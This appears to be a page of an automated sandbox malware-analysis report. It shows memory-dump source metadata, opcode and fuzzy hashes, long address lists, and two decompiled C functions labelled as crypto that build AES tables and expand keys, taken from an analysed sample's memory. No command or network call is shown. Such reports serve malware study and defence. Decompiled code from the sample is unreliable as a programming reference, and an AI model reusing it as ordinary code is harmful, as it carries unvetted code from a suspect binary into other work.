                                                                                                                0x00ed98ee
                                                                                                                0x00ed98f3
                                                                                                                0x00ed98f6
                                                                                                                0x00ed98fb
                                                                                                                0x00ed98fe
                                                                                                                0x00ed9900
                                                                                                                0x00ed9902
                                                                                                                0x00ed9905
                                                                                                                0x00ed9908
                                                                                                                0x00ed9915
                                                                                                                0x00ed991a
                                                                                                                0x00ed991a
                                                                                                                0x00ed9908
                                                                                                                0x00ed9921
                                                                                                                0x00ed9926
                                                                                                                0x00ed9929
                                                                                                                0x00ed992e
                                                                                                                0x00ed9931
                                                                                                                0x00ed9933
                                                                                                                0x00ed9940
                                                                                                                0x00ed9945
                                                                                                                0x00ed9933
                                                                                                                0x00ed9948
                                                                                                                0x00ed994b
                                                                                                                0x00ed9950
                                                                                                                0x00ed9950
                                                                                                                0x00ed989c
                                                                                                                0x00ed989f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed98a1
                                                                                                                0x00000000
                                                                                                                0x00ed98a1
                                                                                                                0x00ed988e
                                                                                                                0x00ed9890
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9890
                                                                                                                0x00ed987f
                                                                                                                0x00ed9882
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9884
                                                                                                                0x00000000
                                                                                                                0x00ed9884
                                                                                                                0x00ed9878
                                                                                                                0x00ed9878
                                                                                                                0x00ed9878
                                                                                                                0x00000000
                                                                                                                0x00ed9878
                                                                                                                0x00ed986a
                                                                                                                0x00ed986d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed986d
                                                                                                                0x00ed983d
                                                                                                                0x00ed9840
                                                                                                                0x00ed9842
                                                                                                                0x00ed984a
                                                                                                                0x00ed984c
                                                                                                                0x00ed9856
                                                                                                                0x00ed9858
                                                                                                                0x00ed985a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed985c
                                                                                                                0x00ed9860
                                                                                                                0x00ed9860
                                                                                                                0x00000000
                                                                                                                0x00ed9860
                                                                                                                0x00ed984e
                                                                                                                0x00000000
                                                                                                                0x00ed984e
                                                                                                                0x00ed9844
                                                                                                                0x00000000
                                                                                                                0x00ed9844
                                                                                                                0x00ed981c
                                                                                                                0x00000000
                                                                                                                0x00ed981c
                                                                                                                0x00ed9777
                                                                                                                0x00ed9777
                                                                                                                0x00000000
                                                                                                                0x00ed9777
                                                                                                                0x00ed9802
                                                                                                                0x00ed9802
                                                                                                                0x00ed9805
                                                                                                                0x00ed97d7
                                                                                                                0x00ed97d7
                                                                                                                0x00ed97d8
                                                                                                                0x00ed97da
                                                                                                                0x00ed97dc
                                                                                                                0x00000000
                                                                                                                0x00ed97dc
                                                                                                                0x00ed9807
                                                                                                                0x00ed980a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9810
                                                                                                                0x00ed977f
                                                                                                                0x00ed977f
                                                                                                                0x00000000
                                                                                                                0x00ed977f
                                                                                                                0x00ed97ab
                                                                                                                0x00ed97ee
                                                                                                                0x00000000
                                                                                                                0x00ed97ee
                                                                                                                0x00ed97ad
                                                                                                                0x00ed97b0
                                                                                                                0x00ed97e3
                                                                                                                0x00ed97e5
                                                                                                                0x00000000
                                                                                                                0x00ed97e5
                                                                                                                0x00ed97b2
                                                                                                                0x00ed97b5
                                                                                                                0x00ed97d3
                                                                                                                0x00ed97d3
                                                                                                                0x00ed97d3
                                                                                                                0x00ed97d3
                                                                                                                0x00000000
                                                                                                                0x00ed97d3
                                                                                                                0x00ed97b7
                                                                                                                0x00ed97ba
                                                                                                                0x00ed97cc
                                                                                                                0x00000000
                                                                                                                0x00ed97cc
                                                                                                                0x00ed97bc
                                                                                                                0x00ed97bf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed97c3
                                                                                                                0x00000000
                                                                                                                0x00ed97c3
                                                                                                                0x00ed973a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9740
                                                                                                                0x00ed9743
                                                                                                                0x00ed9783
                                                                                                                0x00ed9783
                                                                                                                0x00ed9786
                                                                                                                0x00ed979f
                                                                                                                0x00000000
                                                                                                                0x00ed979f
                                                                                                                0x00ed9788
                                                                                                                0x00ed9788
                                                                                                                0x00ed978b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed978e
                                                                                                                0x00ed9791
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9793
                                                                                                                0x00ed9796
                                                                                                                0x00000000
                                                                                                                0x00ed9796
                                                                                                                0x00ed9745
                                                                                                                0x00ed977e
                                                                                                                0x00000000
                                                                                                                0x00ed977e
                                                                                                                0x00ed974a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9753
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9758
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed975d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9766
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                                                • Instruction ID: eba166c7db48593720af26ff832708513c1ff6601b6b3587b7de334c329fd3a8
                                                                                                                • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                                                • Instruction Fuzzy Hash: 0D5144646206449ADB384D688DA67FE23C9DB43708F18391BE482FB383C615DE47A352
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC4AD7, Relevance: .2, Instructions: 190COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E00EC4AD7() {
				intOrPtr _v8;
				char _v521;
				char _t140;
				signed int _t154;
				signed int _t155;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t179;
				signed int _t181;
				signed char _t192;
				signed int _t199;
				signed int _t207;
				void* _t208;
				signed int _t209;
				signed char _t211;
				signed int _t219;
				void* _t220;

				_t140 = 0;
				_t179 = 1;
				_t207 = 1;
				do {
					 *(_t220 + _t140 - 0x304) = _t207;
					 *(_t220 + _t140 - 0x205) = _t207;
					 *((char*)(_t220 + _t207 - 0x104)) = _t140;
					_v8 = _t140 + 1;
					asm("sbb ecx, ecx");
					_t140 = _v8;
					_t207 = _t207 ^  ~(_t207 & 0x80) & 0x0000011b ^ _t207 + _t207;
				} while (_t207 != 1);
				_t208 = 0;
				do {
					 *(_t208 + 0xef7fc0) = _t179;
					asm("sbb ecx, ecx");
					_t179 = _t179 + _t179 ^  ~(_t179 & 0x80) & 0x0000011b;
					_t208 = _t208 + 1;
				} while (_t208 < 0x1e);
				_t181 = 0;
				do {
					if(_t181 == 0) {
						_t209 = 0;
					} else {
						_t209 =  *( &_v521 - ( *(_t220 + (_t181 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
					}
					_t192 = (_t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) ^ 0x00006300) >> 0x00000008 ^ _t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209);
					 *(_t181 + 0xef7dc0) = _t192;
					 *(0xef8be1 + _t181 * 4) = _t192;
					 *(0xef8be0 + _t181 * 4) = _t192;
					 *(0xef87e3 + _t181 * 4) = _t192;
					 *(0xef87e0 + _t181 * 4) = _t192;
					 *(0xef83e3 + _t181 * 4) = _t192;
					 *(0xef83e2 + _t181 * 4) = _t192;
					 *(0xef7fe2 + _t181 * 4) = _t192;
					 *(0xef7fe1 + _t181 * 4) = _t192;
					if(_t192 == 0) {
						_t154 = 0;
					} else {
						_t154 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
					}
					 *(0xef8be3 + _t181 * 4) = _t154;
					 *(0xef87e2 + _t181 * 4) = _t154;
					 *(0xef83e1 + _t181 * 4) = _t154;
					 *(0xef7fe0 + _t181 * 4) = _t154;
					if(_t192 == 0) {
						_t155 = 0;
					} else {
						_t155 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
					}
					_t219 = _t181 & 0x000000ff;
					 *(0xef8be2 + _t181 * 4) = _t155;
					 *(0xef87e1 + _t181 * 4) = _t155;
					 *(0xef83e0 + _t181 * 4) = _t155;
					 *(0xef7fe3 + _t181 * 4) = _t155;
					if((((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219)) == 5) {
						_t211 = 0;
					} else {
						_t211 =  *((intOrPtr*)( &_v521 - ( *(_t220 + (((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 & 0x000000ff ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
					}
					 *(_t181 + 0xef7ec0) = _t211;
					if(_t211 == 0) {
						_t159 = 0;
					} else {
						_t159 =  *(_t220 + ( *(_t220 + (_t211 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
					}
					_t199 = _t211 & 0x000000ff;
					 *(0xef9be2 + _t181 * 4) = _t159;
					 *(0xef97e1 + _t181 * 4) = _t159;
					 *(0xef93e0 + _t181 * 4) = _t159;
					 *(0xef8fe3 + _t181 * 4) = _t159;
					 *(0xefabe2 + _t199 * 4) = _t159;
					 *(0xefa7e1 + _t199 * 4) = _t159;
					 *(0xefa3e0 + _t199 * 4) = _t159;
					 *(0xef9fe3 + _t199 * 4) = _t159;
					if(_t211 == 0) {
						_t160 = 0;
					} else {
						_t160 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
					}
					 *(0xef9be0 + _t181 * 4) = _t160;
					 *(0xef97e3 + _t181 * 4) = _t160;
					 *(0xef93e2 + _t181 * 4) = _t160;
					 *(0xef8fe1 + _t181 * 4) = _t160;
					 *(0xefabe0 + _t199 * 4) = _t160;
					 *(0xefa7e3 + _t199 * 4) = _t160;
					 *(0xefa3e2 + _t199 * 4) = _t160;
					 *(0xef9fe1 + _t199 * 4) = _t160;
					if(_t211 == 0) {
						_t161 = 0;
					} else {
						_t161 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
					}
					 *(0xef9be1 + _t181 * 4) = _t161;
					 *(0xef97e0 + _t181 * 4) = _t161;
					 *(0xef93e3 + _t181 * 4) = _t161;
					 *(0xef8fe2 + _t181 * 4) = _t161;
					 *(0xefabe1 + _t199 * 4) = _t161;
					 *(0xefa7e0 + _t199 * 4) = _t161;
					 *(0xefa3e3 + _t199 * 4) = _t161;
					 *(0xef9fe2 + _t199 * 4) = _t161;
					if(_t211 == 0) {
						_t162 = 0;
					} else {
						_t162 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
					}
					 *(0xef9be3 + _t181 * 4) = _t162;
					 *(0xef97e2 + _t181 * 4) = _t162;
					 *(0xef93e1 + _t181 * 4) = _t162;
					 *(0xef8fe0 + _t181 * 4) = _t162;
					_t181 = _t181 + 1;
					 *(0xefabe3 + _t199 * 4) = _t162;
					 *(0xefa7e2 + _t199 * 4) = _t162;
					 *(0xefa3e1 + _t199 * 4) = _t162;
					 *(0xef9fe0 + _t199 * 4) = _t162;
				} while (_t181 < 0x100);
				return _t162;
			}






















                                                                                                                0x00ec4ae0
                                                                                                                0x00ec4ae5
                                                                                                                0x00ec4ae7
                                                                                                                0x00ec4aee
                                                                                                                0x00ec4aee
                                                                                                                0x00ec4af5
                                                                                                                0x00ec4afc
                                                                                                                0x00ec4b04
                                                                                                                0x00ec4b13
                                                                                                                0x00ec4b19
                                                                                                                0x00ec4b1c
                                                                                                                0x00ec4b1e
                                                                                                                0x00ec4b22
                                                                                                                0x00ec4b24
                                                                                                                0x00ec4b26
                                                                                                                0x00ec4b33
                                                                                                                0x00ec4b39
                                                                                                                0x00ec4b3b
                                                                                                                0x00ec4b3c
                                                                                                                0x00ec4b41
                                                                                                                0x00ec4b43
                                                                                                                0x00ec4b45
                                                                                                                0x00ec4b5f
                                                                                                                0x00ec4b47
                                                                                                                0x00ec4b5a
                                                                                                                0x00ec4b5a
                                                                                                                0x00ec4b7d
                                                                                                                0x00ec4b7f
                                                                                                                0x00ec4b85
                                                                                                                0x00ec4b8c
                                                                                                                0x00ec4b93
                                                                                                                0x00ec4b9a
                                                                                                                0x00ec4ba1
                                                                                                                0x00ec4ba8
                                                                                                                0x00ec4baf
                                                                                                                0x00ec4bb6
                                                                                                                0x00ec4bbf
                                                                                                                0x00ec4bd6
                                                                                                                0x00ec4bc1
                                                                                                                0x00ec4bcc
                                                                                                                0x00ec4bcc
                                                                                                                0x00ec4bd8
                                                                                                                0x00ec4bdf
                                                                                                                0x00ec4be6
                                                                                                                0x00ec4bed
                                                                                                                0x00ec4bf6
                                                                                                                0x00ec4c0d
                                                                                                                0x00ec4bf8
                                                                                                                0x00ec4c03
                                                                                                                0x00ec4c03
                                                                                                                0x00ec4c0f
                                                                                                                0x00ec4c14
                                                                                                                0x00ec4c20
                                                                                                                0x00ec4c2c
                                                                                                                0x00ec4c35
                                                                                                                0x00ec4c45
                                                                                                                0x00ec4c79
                                                                                                                0x00ec4c47
                                                                                                                0x00ec4c75
                                                                                                                0x00ec4c75
                                                                                                                0x00ec4c7b
                                                                                                                0x00ec4c83
                                                                                                                0x00ec4c9a
                                                                                                                0x00ec4c85
                                                                                                                0x00ec4c90
                                                                                                                0x00ec4c90
                                                                                                                0x00ec4c9c
                                                                                                                0x00ec4c9f
                                                                                                                0x00ec4ca6
                                                                                                                0x00ec4cad
                                                                                                                0x00ec4cb4
                                                                                                                0x00ec4cbb
                                                                                                                0x00ec4cc2
                                                                                                                0x00ec4cc9
                                                                                                                0x00ec4cd0
                                                                                                                0x00ec4cd9
                                                                                                                0x00ec4ced
                                                                                                                0x00ec4cdb
                                                                                                                0x00ec4ce3
                                                                                                                0x00ec4ce3
                                                                                                                0x00ec4cef
                                                                                                                0x00ec4cf6
                                                                                                                0x00ec4cfd
                                                                                                                0x00ec4d04
                                                                                                                0x00ec4d0b
                                                                                                                0x00ec4d12
                                                                                                                0x00ec4d19
                                                                                                                0x00ec4d20
                                                                                                                0x00ec4d29
                                                                                                                0x00ec4d3d
                                                                                                                0x00ec4d2b
                                                                                                                0x00ec4d33
                                                                                                                0x00ec4d33
                                                                                                                0x00ec4d3f
                                                                                                                0x00ec4d46
                                                                                                                0x00ec4d4d
                                                                                                                0x00ec4d54
                                                                                                                0x00ec4d5b
                                                                                                                0x00ec4d62
                                                                                                                0x00ec4d69
                                                                                                                0x00ec4d70
                                                                                                                0x00ec4d79
                                                                                                                0x00ec4d8d
                                                                                                                0x00ec4d7b
                                                                                                                0x00ec4d83
                                                                                                                0x00ec4d83
                                                                                                                0x00ec4d8f
                                                                                                                0x00ec4d96
                                                                                                                0x00ec4d9d
                                                                                                                0x00ec4da4
                                                                                                                0x00ec4dab
                                                                                                                0x00ec4dac
                                                                                                                0x00ec4db3
                                                                                                                0x00ec4dba
                                                                                                                0x00ec4dc1
                                                                                                                0x00ec4dc8
                                                                                                                0x00ec4dd9

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 88222e77e4ef9dc8c878c7e3f00e78f803a421ff791ab006fdd2778630719ae8
                                                                                                                • Instruction ID: 89257ab3100c58d03ea1382a7855c4dd9faa540c5b49dafceb66bcba887ee5de
                                                                                                                • Opcode Fuzzy Hash: 88222e77e4ef9dc8c878c7e3f00e78f803a421ff791ab006fdd2778630719ae8
                                                                                                                • Instruction Fuzzy Hash: 4C818DC221A2E49EC7069F3E39E47F53EA157B3341B2C01EAC4C5E62A3D4364A5DC722
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC548E, Relevance: .2, Instructions: 154COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EC548E(signed char __ecx, char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int _v36;
				signed char _v40;
				signed char _t96;
				signed int _t117;
				signed int* _t121;
				signed int* _t122;
				void* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				char* _t132;
				void* _t133;
				signed int _t135;
				signed char _t137;
				signed char* _t139;
				signed char* _t141;
				void* _t161;
				void* _t164;

				_t137 = __ecx;
				_t135 = _a4 - 6;
				_v40 = __ecx;
				_v36 = _t135;
				_t96 = E00ED4C60( &_v32, _a4, 0x20);
				_t141 =  &(( &_v40)[0xc]);
				_t117 = 0;
				_t133 = 0;
				_t126 = 0;
				if(_t135 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t127 = 0xef7fc0;
						do {
							_v32 = _v32 ^  *((_t141[0x15 + _t135 * 4] & 0x000000ff) + 0xef7dc0);
							_v31 = _v31 ^  *((_t141[0x16 + _t135 * 4] & 0x000000ff) + 0xef7dc0);
							_v30 = _v30 ^  *((_t141[0x17 + _t135 * 4] & 0x000000ff) + 0xef7dc0);
							_v29 = _v29 ^  *((_t141[0x14 + _t135 * 4] & 0x000000ff) + 0xef7dc0);
							_t96 =  *_t127;
							_v32 = _v32 ^ _t96;
							_v36 = _t127 + 1;
							if(_t135 == 8) {
								_t121 =  &_v28;
								_v40 = 3;
								do {
									_t129 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t129 = _t129 - 1;
									} while (_t129 != 0);
									_t58 =  &_v40;
									 *_t58 = _v40 - 1;
								} while ( *_t58 != 0);
								_t122 =  &_v12;
								_v40 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0xef7dc0);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0xef7dc0);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0xef7dc0);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0xef7dc0);
								do {
									_t130 = 4;
									do {
										_t96 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t96;
										_t122 =  &(_t122[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t79 =  &_v40;
									 *_t79 = _v40 - 1;
								} while ( *_t79 != 0);
							} else {
								if(_t135 > 1) {
									_t46 = _t135 - 1; // 0x3
									_t132 =  &_v28;
									_v40 = _t46;
									do {
										_t124 = 0;
										do {
											_t96 =  *((intOrPtr*)(_t132 + _t124 - 4));
											 *(_t132 + _t124) =  *(_t132 + _t124) ^ _t96;
											_t124 = _t124 + 1;
										} while (_t124 < 4);
										_t132 = _t132 + 4;
										_t53 =  &_v40;
										 *_t53 = _v40 - 1;
									} while ( *_t53 != 0);
								}
							}
							_t131 = 0;
							if(_t135 <= 0) {
								L37:
								_t164 = _t117 - _a4;
							} else {
								while(_t117 <= _a4) {
									if(_t131 >= _t135) {
										L33:
										_t161 = _t133 - 4;
									} else {
										_t96 =  &(( &_v32)[_t131]);
										_v40 = _t96;
										while(_t133 < 4) {
											 *((intOrPtr*)(_t137 + 0x18 + (_t133 + _t117 * 4) * 4)) =  *_t96;
											_t131 = _t131 + 1;
											_t96 = _v40 + 4;
											_t133 = _t133 + 1;
											_v40 = _t96;
											if(_t131 < _t135) {
												continue;
											} else {
												goto L33;
											}
											goto L34;
										}
									}
									L34:
									if(_t161 == 0) {
										_t117 = _t117 + 1;
										_t133 = 0;
									}
									if(_t131 < _t135) {
										continue;
									} else {
										goto L37;
									}
									goto L38;
								}
							}
							L38:
							_t127 = _v36;
						} while (_t164 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t126 < _t135) {
							_t139 =  &(( &_v32)[_t126]);
							while(_t133 < 4) {
								_t125 = _t133 + _t117 * 4;
								_t96 =  *_t139;
								_t126 = _t126 + 1;
								_t139 =  &_a4;
								_t133 = _t133 + 1;
								 *(_v40 + 0x18 + _t125 * 4) = _t96;
								_t135 = _v36;
								if(_t126 < _t135) {
									continue;
								}
								break;
							}
							_t137 = _v40;
						}
						if(_t133 == 4) {
							_t117 = _t117 + 1;
							_t133 = 0;
						}
						if(_t126 < _t135) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t96;
			}






































                                                                                                                0x00ec5494
                                                                                                                0x00ec54a4
                                                                                                                0x00ec54a7
                                                                                                                0x00ec54ac
                                                                                                                0x00ec54b0
                                                                                                                0x00ec54b5
                                                                                                                0x00ec54b8
                                                                                                                0x00ec54ba
                                                                                                                0x00ec54bc
                                                                                                                0x00ec54c0
                                                                                                                0x00ec5507
                                                                                                                0x00ec550a
                                                                                                                0x00ec5510
                                                                                                                0x00ec5515
                                                                                                                0x00ec5524
                                                                                                                0x00ec5533
                                                                                                                0x00ec5542
                                                                                                                0x00ec5551
                                                                                                                0x00ec5555
                                                                                                                0x00ec5557
                                                                                                                0x00ec555c
                                                                                                                0x00ec5563
                                                                                                                0x00ec5594
                                                                                                                0x00ec5598
                                                                                                                0x00ec55a0
                                                                                                                0x00ec55a2
                                                                                                                0x00ec55a3
                                                                                                                0x00ec55a6
                                                                                                                0x00ec55a8
                                                                                                                0x00ec55a9
                                                                                                                0x00ec55a9
                                                                                                                0x00ec55ae
                                                                                                                0x00ec55ae
                                                                                                                0x00ec55ae
                                                                                                                0x00ec55ba
                                                                                                                0x00ec55be
                                                                                                                0x00ec55cc
                                                                                                                0x00ec55db
                                                                                                                0x00ec55ea
                                                                                                                0x00ec55f9
                                                                                                                0x00ec55fd
                                                                                                                0x00ec55ff
                                                                                                                0x00ec5600
                                                                                                                0x00ec5600
                                                                                                                0x00ec5603
                                                                                                                0x00ec5605
                                                                                                                0x00ec5606
                                                                                                                0x00ec5606
                                                                                                                0x00ec560b
                                                                                                                0x00ec560b
                                                                                                                0x00ec560b
                                                                                                                0x00ec5565
                                                                                                                0x00ec5568
                                                                                                                0x00ec556e
                                                                                                                0x00ec5571
                                                                                                                0x00ec5575
                                                                                                                0x00ec5579
                                                                                                                0x00ec5579
                                                                                                                0x00ec557b
                                                                                                                0x00ec557b
                                                                                                                0x00ec557f
                                                                                                                0x00ec5582
                                                                                                                0x00ec5583
                                                                                                                0x00ec5588
                                                                                                                0x00ec558b
                                                                                                                0x00ec558b
                                                                                                                0x00ec558b
                                                                                                                0x00ec5592
                                                                                                                0x00ec5568
                                                                                                                0x00ec5612
                                                                                                                0x00ec5616
                                                                                                                0x00ec5657
                                                                                                                0x00ec5657
                                                                                                                0x00000000
                                                                                                                0x00ec5618
                                                                                                                0x00ec561f
                                                                                                                0x00ec564b
                                                                                                                0x00ec564b
                                                                                                                0x00ec5621
                                                                                                                0x00ec5625
                                                                                                                0x00ec5628
                                                                                                                0x00ec562c
                                                                                                                0x00ec5636
                                                                                                                0x00ec563a
                                                                                                                0x00ec563f
                                                                                                                0x00ec5642
                                                                                                                0x00ec5643
                                                                                                                0x00ec5649
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec5649
                                                                                                                0x00ec562c
                                                                                                                0x00ec564e
                                                                                                                0x00ec564e
                                                                                                                0x00ec5650
                                                                                                                0x00ec5651
                                                                                                                0x00ec5651
                                                                                                                0x00ec5655
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec5655
                                                                                                                0x00ec5618
                                                                                                                0x00ec565a
                                                                                                                0x00ec565a
                                                                                                                0x00ec565a
                                                                                                                0x00ec5515
                                                                                                                0x00000000
                                                                                                                0x00ec54c2
                                                                                                                0x00ec54cd
                                                                                                                0x00ec54d3
                                                                                                                0x00ec54d7
                                                                                                                0x00ec54e0
                                                                                                                0x00ec54e3
                                                                                                                0x00ec54e6
                                                                                                                0x00ec54e7
                                                                                                                0x00ec54ea
                                                                                                                0x00ec54eb
                                                                                                                0x00ec54ef
                                                                                                                0x00ec54f5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec54f5
                                                                                                                0x00ec54f7
                                                                                                                0x00ec54f7
                                                                                                                0x00ec54fe
                                                                                                                0x00ec5500
                                                                                                                0x00ec5501
                                                                                                                0x00ec5501
                                                                                                                0x00ec5505
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec5505
                                                                                                                0x00ec54c2
                                                                                                                0x00ec566b
                                                                                                                0x00ec566b

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b12d2dc4644c2e1734efbeb69fa29ae682c6381a807c1bb55f1e774bc405d2a8
                                                                                                                • Instruction ID: 4918903344f9fe0bcea3d7aa65f16e65b8f3a02cbce7d2ce371c5dafb6d9fe45
                                                                                                                • Opcode Fuzzy Hash: b12d2dc4644c2e1734efbeb69fa29ae682c6381a807c1bb55f1e774bc405d2a8
                                                                                                                • Instruction Fuzzy Hash: 3C51F63250C7D14EC701CF24865497EBFE1BEDA318F49599EE4E56B102C332E68ACB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC15F3, Relevance: .1, Instructions: 76COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
